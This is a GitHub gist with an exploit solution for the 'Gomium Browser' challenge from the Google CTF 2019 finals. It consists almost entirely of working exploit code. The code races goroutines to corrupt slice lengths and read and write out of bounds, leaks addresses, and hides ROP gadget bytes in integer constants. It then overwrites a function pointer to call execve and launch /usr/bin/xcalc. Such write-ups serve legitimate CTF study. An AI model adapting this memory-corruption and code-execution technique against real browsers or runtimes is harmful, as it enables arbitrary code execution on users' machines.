Skip to content

Instantly share code, notes, and snippets.

@hama7230 hama7230/exploit.htm
Last active Feb 24, 2020

Embed
What would you like to do?
Google Capture The Flag 2019 (Finals) Gomium Browser
<html>
<script type="text/goscript">
package main
import "fmt"
func bring_your_own_gadgts(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 {
var a uint64 = 0xc3050f585a5e5f58;
var b uint64 = 0xdeadbeefdeadbeef+1
var c uint64 = 0xdeadbeefdeadbeef+2
var d uint64 = 0xdeadbeefdeadbeef+3
var e uint64 = 0xdeadbeefdeadbeef+4
tmp := []uint64{a, b, c, d, e}
fmt.Println("hoge")
// return a + b
return tmp[0] + tmp[1]
}
type fptr struct {
f func(x uint64, y uint64, z uint64, w uint64, v uint64) uint64
}
func addrof(i interface{}) uint64 {
s := fmt.Sprintf("%p", i)
var result uint64 = 0
for i := 0; i < len(s) - 2; i++ {
var tmp uint64 = 0
var c = uint8(s[len(s) - i - 1: len(s) - i][0])
if '0' <= c && c <= '9' {
tmp = uint64(c) - uint64('0')
} else {
tmp = uint64(c) - 'a' + 10
}
result += (uint64(tmp) << (i*4))
}
return result
}
var win bool = false
func main() {
long := make([]*uint64, 8)
short := make([]*uint64, 4)
target := make([]*uint64, 4)
oob := make([]uint64, 4)
func_ptr := new(fptr)
str := "hogehogehogehoge"
oob[0]= 0xdeadbeef
fmt.Printf("%x\n", addrof(&long))
fmt.Printf("%x\n", addrof(&short))
fmt.Printf("%x\n", addrof(&target))
fmt.Printf("%x\n", addrof(&oob))
fmt.Printf("%x\n", addrof(&func_ptr))
fmt.Printf("%x\n", addrof(&str))
var hoge uint64 = 0xdeadbeefdeadbeef
confused := short
go func() {
for win == false {
confused = long
confused = short
}
}()
g := func() {
confused[5] = &hoge
confused[6] = &hoge
if len(target) > 0x10 {
win = true
return
}
}
f := func() {
defer func() {
if r := recover(); r != nil {
}
}()
g()
}
for win == false {
f()
}
fmt.Println("race win")
fmt.Println("len(target)=", len(target))
target[4] = nil
target[5] = &hoge
target[6] = &hoge
target[6] = &hoge
func_ptr.f = bring_your_own_gadgts
oob[addrof(&oob)/8 + 1] = addrof(&func_ptr)+ 0x100
oob[addrof(&oob)/8 + 2] = addrof(&func_ptr)+ 0x100
// overwrite function pointer
oob[addrof(&func_ptr)/8 + 1] = addrof(&func_ptr) + 0x18
oob[addrof(&func_ptr)/8 + 3] = addrof(bring_your_own_gadgts) + 0x39
// write "//usr/bin/xcalc" and its pointer
oob[addrof(&oob)/8 + 4] = 0x69622f7273752f2f
oob[addrof(&oob)/8 + 5] = 0x00636c6163782f6e
oob[addrof(&oob)/8 + 8] = addrof(&oob) + 0x20
// write "DISPLAY=:0" and its pointer
oob[addrof(&oob)/8 + 10] = 0x3d59414c50534944
oob[addrof(&oob)/8 + 11] = 0x303a
oob[addrof(&oob)/8 + 12] = addrof(&oob) + 0x50
// trigger execve()
func_ptr.f(addrof(&oob) + 0x20, addrof(&oob) + 0x40, addrof(&oob)+0x60, 59, 0xdeadbeef)
}
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.